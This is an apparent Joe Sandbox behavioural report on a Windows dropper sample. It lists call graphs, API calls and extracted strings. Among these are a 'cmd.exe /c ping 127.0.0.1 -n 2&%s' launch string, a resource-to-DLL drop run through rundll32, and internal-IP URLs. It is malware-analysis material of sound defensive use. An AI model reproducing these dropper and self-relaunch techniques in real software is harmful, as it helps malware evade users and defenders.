                                                execution_graph 1425 402440 SendMessageA 1426 40247d 1425->1426 1429 402850 CoInitialize 1426->1429 1428 402566 1430 40287e 1429->1430 1434 402910 1430->1434 1432 4028e0 CoUninitialize 1433 4028f9 1432->1433 1433->1428 1435 402ea7 1434->1435 1439 402941 1434->1439 1435->1432 1436 40297b SysFreeString 1436->1435 1438 402a10 VariantClear VariantClear 1438->1439 1439->1436 1439->1438 1440 402b0a VariantClear VariantClear 1439->1440 1441 402b76 VariantClear VariantClear VariantClear 1439->1441 1442 402be2 VariantClear VariantClear VariantClear 1439->1442 1443 402c48 VariantClear VariantClear VariantClear 1439->1443 1444 402c7b lstrlenW 1439->1444 1445 402c97 WideCharToMultiByte 1439->1445 1446 402cc2 lstrlenW 1439->1446 1447 402cfb lstrlenW 1439->1447 1448 402cd8 WideCharToMultiByte 1439->1448 1449 402d11 WideCharToMultiByte 1439->1449 1450 402d43 _mbsicmp 1439->1450 1451 402f00 VariantClear lstrlen MultiByteToWideChar SysAllocString 1439->1451 1452 402e34 VariantClear VariantClear VariantClear 1439->1452 1453 402e26 VariantClear 1439->1453 1440->1439 1441->1439 1442->1439 1443->1439 1444->1439 1445->1439 1446->1439 1447->1439 1448->1439 1449->1439 1450->1439 1451->1439 1452->1439 1453->1439 1454 401c60 1455 4041a8 1454->1455 1456 401c7f GetSystemMenu 1455->1456 1459 401c91 1456->1459 1457 401cf5 SendMessageA SendMessageA 1458 401d3d 1457->1458 1459->1457 1460 401ce4 1459->1460 1461 401cbe AppendMenuA AppendMenuA 1459->1461 1460->1457 1461->1460 1472 402ee0 SysFreeString 1475 401080 1480 401090 1475->1480 1477 401085 1483 404390 1477->1483 1481 401020 1480->1481 1482 40102a __p___argv DeleteFileA 1481->1482 1482->1477 1486 404364 1483->1486 1485 4010aa 1487 404379 __dllonexit 1486->1487 1488 40436d _onexit 1486->1488 1487->1485 1488->1485 1495 401f00 CoInitialize 1496 401f36 1495->1496 1497 401f65 _mbscmp 1496->1497 1498 401f86 1497->1498 1499 401ff9 1498->1499 1500 401f8a 1498->1500 1502 402005 _mbscmp 1499->1502 1510 403060 1500->1510 1503 402020 1502->1503 1505 401f94 1503->1505 1506 402030 _mbscmp 1503->1506 1504 402063 CoUninitialize 1507 40207a 1504->1507 1505->1504 1506->1505 1509 40209e 1507->1509 1519 403260 1507->1519 1511 4030f7 1510->1511 1512 40308a 1510->1512 1511->1505 1513 4030b5 SysFreeString 1512->1513 1518 40310c 1512->1518 1513->1511 1515 403227 SysFreeString 1515->1505 1517 403188 VariantClear VariantClear 1517->1518 1518->1515 1518->1517 1520 403289 1519->1520 1521 4032b1 1520->1521 1526 403410 MultiByteToWideChar SysAllocStringLen 1520->1526 1521->1509 1525 4033bf 1525->1509 1527 403440 MultiByteToWideChar 1526->1527 1528 403386 SysFreeString 1526->1528 1527->1528 1528->1525 1544 403d20 1545 404328 1544->1545 1546 403d45 _mbscmp 1545->1546 1547 403d66 1546->1547 1548 403d8a 1546->1548 1549 403e2d fopen 1548->1549 1551 403df2 1548->1551 1550 403e46 fprintf fclose 1549->1550 1549->1551 1550->1551 1555 401de0 IsIconic 1556 401e8a 1555->1556 1557 401df8 1555->1557 1558 401e04 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 1557->1558 1559 401e83 1558->1559 1462 403461 EnableWindow 1404 415f67 1405 415f76 1404->1405 1406 415fd3 VirtualFree 1405->1406 1407 415ffb 1406->1407 1408 416143 VirtualProtect 1407->1408 1409 416162 1407->1409 1408->1408 1408->1409 1410 4043ec __set_app_type __p__fmode __p__commode 1411 40445b 1410->1411 1412 404463 __setusermatherr 1411->1412 1413 40446f 1411->1413 1412->1413 1422 40455c _controlfp 1413->1422 1415 404474 _initterm __getmainargs _initterm 1416 4044c8 GetStartupInfoA 1415->1416 1418 4044fc GetModuleHandleA 1416->1418 1423 404578 1418->1423 1421 404520 exit _XcptFilter 1422->1415 1424 40458d 1423->1424 1424->1421 1350 401690 1351 4016b5 1350->1351 1352 4016bf __p___argv 1351->1352 1353 4016d3 1352->1353 1354 4016ce 1352->1354 1377 4013d0 FindResourceA 1353->1377 1362 401220 1354->1362 1357 4016d8 1358 4016e4 1357->1358 1359 4016dc ExitProcess 1357->1359 1387 4019c0 1358->1387 1361 4016ef 1363 40415a 1362->1363 1364 401234 __p___argv 1363->1364 1390 401140 1364->1390 1366 401260 1367 40128d 1366->1367 1368 40126f __p___argv 1366->1368 1397 4010c0 GetTickCount srand rand 1367->1397 1369 401140 3 API calls 1368->1369 1371 401281 Sleep 1369->1371 1371->1367 1371->1368 1372 4012ca GetTickCount wsprintfA CreateFileA 1373 40415a 1372->1373 1374 401318 Sleep WriteFile Sleep WriteFile CloseHandle 1373->1374 1375 40135c 1374->1375 1376 401362 __p___argv wsprintfA WinExec Sleep ExitProcess 1375->1376 1378 4013f0 1377->1378 1379 4013f9 LoadResource 1377->1379 1378->1357 1380 401411 SizeofResource LockResource 1379->1380 1381 401408 1379->1381 1384 401455 1380->1384 1381->1357 1382 4010c0 4 API calls 1383 4014f7 wsprintfA CreateDirectoryA Sleep 1382->1383 1385 4010c0 4 API calls 1383->1385 1384->1382 1386 40154a 7 API calls 1385->1386 1386->1357 1388 4019ec 1387->1388 1389 401b3f LoadIconA 1388->1389 1389->1361 1402 4043b0 1390->1402 1393 401193 ReadFile 1396 4011fc CloseHandle 1393->1396 1394 401188 1394->1366 1396->1366 1398 401103 1397->1398 1399 401131 1398->1399 1400 401110 rand 1398->1400 1399->1372 1400->1400 1401 401127 1400->1401 1401->1372 1403 40114a CreateFileA 1402->1403 1403->1393 1403->1394 1473 402ef0 VariantClear 1489 402170 1490 40219e 1489->1490 1491 4021ec SendMessageA 1490->1491 1493 40220a 1491->1493 1492 402342 1493->1492 1494 402323 SendMessageA 1493->1494 1494->1493 1529 402710 1531 40272a 1529->1531 1532 402796 1529->1532 1530 40280d 1531->1532 1533 40274a SendMessageA SendMessageA 1531->1533 1532->1530 1535 4027c1 SendMessageA SendMessageA 1532->1535 1534 404334 1533->1534 1536 402776 SendMessageA SendMessageA 1534->1536 1537 404334 1535->1537 1536->1532 1538 4027ed SendMessageA SendMessageA 1537->1538 1538->1530 1539 403b10 1541 403b39 1539->1541 1540 403c7f 1541->1540 1542 403c66 fopen 1541->1542 1542->1540 1543 403cad fprintf fclose 1542->1543 1543->1540 1553 4039d0 SendMessageA 1554 403a0d 1553->1554 1560 4045b9 1561 4045be 1560->1561 1564 404590 1561->1564 1565 404595 1564->1565 1566 4045b3 1565->1566 1567 4045aa _setmbcp 1565->1567 1567->1566 1463 40101b 1464 401020 1463->1464 1465 40102a __p___argv DeleteFileA 1464->1465 1552 40453e _exit

                                                Executed Functions

                                                Function 00401220 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 136sleepfileprocessCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401140: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401140: ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
                                                  • Part of subcall function 00401140: CloseHandle.KERNELBASE(00000000), ref: 004011FD
                                                • Sleep.KERNEL32(00000064), ref: 00401286
                                                • GetTickCount.KERNEL32 ref: 004012CD
                                                • wsprintfA.USER32 ref: 004012EA
                                                • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                • Sleep.KERNELBASE(00000064), ref: 00401321
                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401331
                                                • Sleep.KERNELBASE(00000064), ref: 00401339
                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00401349
                                                • CloseHandle.KERNELBASE(00000000), ref: 00401350
                                                • __p___argv.MSVCRT ref: 0040137D
                                                • wsprintfA.USER32 ref: 0040139A
                                                • WinExec.KERNEL32(?,00000000), ref: 004013AD
                                                • Sleep.KERNELBASE(000001F4,?,?,?,?,00000000,?), ref: 004013B8
                                                • ExitProcess.KERNEL32 ref: 004013BC
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394
                                                • c:\%s.exe, xrefs: 004012DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
                                                • String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                • API String ID: 529022016-1443030469
                                                • Opcode ID: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
                                                • Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
                                                • Opcode Fuzzy Hash: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
                                                • Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA
                                                Function 00401140 Relevance: 4.6, APIs: 3, Instructions: 71fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 17 401140-401186 call 4043b0 CreateFileA 20 401193-40119b 17->20 21 401188-401192 17->21 22 40119c-4011ce ReadFile 20->22 23 4011d0-4011fa 22->23 24 4011fc-401212 CloseHandle 22->24 23->22
                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
                                                • CloseHandle.KERNELBASE(00000000), ref: 004011FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleRead
                                                • String ID:
                                                • API String ID: 1035965006-0
                                                • Opcode ID: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
                                                • Instruction ID: 90d227093b93e33c59d7a42948e498c78a4efe9ee397008c3d7e124e3062c49f
                                                • Opcode Fuzzy Hash: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
                                                • Instruction Fuzzy Hash: BC21B431304345ABE724CA28DC41BEBB3D5FB88715F40493DFB95E72D0C6B8A9488A5A
                                                Function 00415F67 Relevance: 3.2, APIs: 2, Instructions: 200memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 415f67-415f82 call 416213 28 415f84-415f8c 25->28 29 415f8e-415f95 25->29 30 415fa4-415fbe 28->30 31 415f98-415f9b 29->31 34 415fc5-415fcc 30->34 32 415fd3-415ff9 VirtualFree 31->32 33 415f9d-415fa1 31->33 35 415ffb-415ffe 32->35 36 41603a-41604b call 416169 32->36 33->30 34->32 39 415fce-415fd1 34->39 37 416000-416002 35->37 44 416051-416056 36->44 45 4160d2-4160e5 36->45 37->35 40 416004-41600a 37->40 39->31 42 416020-416028 40->42 43 41600c-416010 40->43 47 41602a-416038 42->47 43->35 46 416012-41601e 43->46 44->45 50 416058-41606b 44->50 48 4160e7-416100 45->48 49 416129-416138 45->49 46->47 47->36 47->37 58 4162b2-4162ba 48->58 59 416106-416122 48->59 53 416162-416163 49->53 54 41613a-416141 49->54 51 416077-41607c 50->51 52 41606d-416075 50->52 57 41607f-416086 51->57 52->57 53->58 55 416143-416160 VirtualProtect 54->55 55->53 55->55 60 4160a8-4160b1 57->60 61 416088-41608a 57->61 59->49 60->45 62 4160b3-4160b6 60->62 63 416092-41609f 61->63 64 41608c-416090 61->64 66 4160c0-4160c2 62->66 67 4160b8-4160be 62->67 63->64 65 4160a1-4160a6 63->65 64->57 65->64 69 4160c5-4160c8 66->69 67->62 69->45 70 4160ca-4160d0 69->70 70->69
                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00415FE0
                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,?), ref: 00416153
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction ID: b5095fd7398c27d52b9b4c2b60e65f433afccfdda2a0a88fef6c4a84fe82fa18
                                                • Opcode Fuzzy Hash: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction Fuzzy Hash: 4D6119326002109FDB25CA14CC847E6BB75EF89314F29449AD5899B381D379EDC2CB55
                                                Function 00A905A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00A90625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A90658
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1679936334.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_a90000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: d3edc25324619c31906757ebce73af4fffde0c11dd4b04b4aaa1fd6e89d5297f
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 8721D435B00219BFDF008F658C45BEEFBF5EB54394F60C162EA10A2280E7744A519B50

                                                Non-executed Functions

                                                Function 004013D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 216COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 004013FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoad
                                                • String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
                                                • API String ID: 2619053042-2457680838
                                                • Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
                                                • Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B
                                                Function 00401DE0 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • IsIconic.USER32(?), ref: 00401DEA
                                                • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
                                                • GetSystemMetrics.USER32(0000000B), ref: 00401E29
                                                • GetSystemMetrics.USER32(0000000C), ref: 00401E2F
                                                • GetClientRect.USER32(?,?), ref: 00401E3C
                                                • DrawIcon.USER32(?,?,?,?), ref: 00401E74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                • String ID:
                                                • API String ID: 2166663075-0
                                                • Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
                                                • Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59
                                                Function 004043EC Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 190 4043ec-404461 __set_app_type __p__fmode __p__commode call 404571 193 404463-40446e __setusermatherr 190->193 194 40446f-4044c6 call 40455c _initterm __getmainargs _initterm 190->194 193->194 197 404502-404505 194->197 198 4044c8-4044d0 194->198 199 404507-40450b 197->199 200 4044df-4044e3 197->200 201 4044d2-4044d4 198->201 202 4044d6-4044d9 198->202 199->197 204 4044e5-4044e7 200->204 205 4044e9-4044fa GetStartupInfoA 200->205 201->198 201->202 202->200 203 4044db-4044dc 202->203 203->200 204->203 204->205 206 4044fc-404500 205->206 207 40450d-40450f 205->207 208 404510-40451b GetModuleHandleA call 404578 206->208 207->208 210 404520-40453d exit _XcptFilter 208->210
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
                                                • Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
                                                • Opcode Fuzzy Hash: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
                                                • Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69
                                                Function 00401F00 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 211 401f00-401f40 CoInitialize call 403f80 214 401f51-401f88 call 403fa0 _mbscmp call 404178 211->214 215 401f42-401f4e 211->215 220 401ff9-402022 call 403fa0 _mbscmp call 404178 214->220 221 401f8a-401f9c call 403060 214->221 215->214 234 402024-40204d call 403fa0 _mbscmp call 404178 220->234 235 40204f-40205e call 403f40 220->235 226 401fcd-401ff7 call 403f80 221->226 227 401f9e-401fc8 call 403f80 221->227 238 402063-402078 CoUninitialize 226->238 227->238 234->235 234->238 235->238 242 40207a-402089 238->242 243 40208d-40209c 238->243 242->243 246 4020c9-4020da 243->246 247 40209e-4020ac 243->247 255 402115-40212a call 403260 246->255 256 4020dc-4020e6 246->256 251 4020b2-4020c6 247->251 252 40215b-402169 247->252 262 402132-40213d 255->262 263 40212c-40212e 255->263 258 4020e8-4020ea 256->258 259 4020ee-4020fc 256->259 258->259 259->252 260 4020fe-402112 259->260 265 402145-402153 262->265 266 40213f-402141 262->266 263->262 265->252 267 402155-402157 265->267 266->265 267->252
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: InitializeUninitialize_mbscmp
                                                • String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
                                                • API String ID: 2492722006-1795800369
                                                • Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
                                                • Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96
                                                Function 00402710 Relevance: 12.1, APIs: 8, Instructions: 97windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
                                                • Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55
                                                Function 00401C60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
                                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
                                                • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
                                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
                                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Menu$AppendMessageSend$System
                                                • String ID: http://www.1.com
                                                • API String ID: 62300227-1471656216
                                                • Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
                                                • Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59
                                                Function 00403D20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: _mbscmp
                                                • String ID: user.ini
                                                • API String ID: 2888065108-1338118170
                                                • Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
                                                • Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB
                                                Function 00402F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 402f00-402f11 VariantClear 359 402f13-402f18 358->359 360 402f1b-402f25 358->360 359->360 361 402f27-402f29 360->361 362 402f2b-402f5b lstrlen call 4043b0 MultiByteToWideChar 360->362 363 402f5e-402f6a SysAllocString 361->363 362->363 366 402f7c-402f85 363->366 367 402f6c-402f6e 363->367 367->366 368 402f70-402f75 367->368 368->366
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 00402F09
                                                • lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
                                                • SysAllocString.OLEAUT32(00000000), ref: 00402F5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
